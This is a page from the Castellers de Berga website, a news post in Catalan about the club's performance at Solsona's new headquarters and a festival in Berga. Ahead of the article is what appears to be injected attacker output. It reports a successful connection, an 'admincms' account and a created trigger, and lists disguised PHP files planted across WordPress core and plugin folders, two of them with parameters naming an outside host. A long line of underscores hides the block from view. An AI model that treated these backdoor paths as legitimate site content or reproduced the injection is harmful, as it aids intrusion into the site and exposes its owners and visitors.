Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax-response https://castellersdeberga.cat/wp-admin/includes/class-wp-automatic-updater-ajax-response-ajax-response-stream-private-meta.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/screen-wp-private-private-ajax-response-core-ajax-ajax.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/setup-config-wp-cron-wp-wp.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/google-calendar-events-cron-ajax-response-private-ajax-ajax.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-ajax-core-ajax-core-wp-meta-stream-meta-ajax-response-private-meta-cron.php https://castellersdeberga.cat/wp-includes/blocks/navigation-ajax-stream.php https://castellersdeberga.cat/wp-includes/ms-network-wp-ajax-private-core-ajax-response-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Inauguració del local dels padrins
 

Inauguració del local dels padrins


Inauguració del local dels padrinsDissabte 26 de juliol, els Castellers de Berga es van desplaçar a Solsona, a la festa d’inauguració del local dels de la camisa groga. Els solsonins van inaugurar la seva nova seu a l’Avinguda Sant Jordi 25, amb una actuació castellera just amb davant amb castellers de Mollet, Berga i Solsona.
Els berguedans, després de l’actuació de l’aniversari, van aixecar el peu de l’accelerador i van descarregar-hi castells de 6. L’actuació va servir per rodar molta gent de tronc i estrenar nova canalla als poms de dalt: enxanetes que passen a dosos i nous acotxadors. Concretament, els Castellers de Berga van descarregar el 3 de 6, el 4 de 6 i el 3 de 6 amb agulla. Després d’aquesta actuació arriben les vacances. No es torna a assajar fins el dimarts 19 d’agost. La primera actuació serà a la Festa Major de Casserres, el divendres 22 d’agost.

Diumenge 27 de juliol, els grallers dels Castellers de Berga van participar a la festa de Els Elois, a Berga, acompanyant els nuvis del casament típic de l’Alt Berguedà que fa 50 anys que organitza l’Agrupació Teatral la Farsa.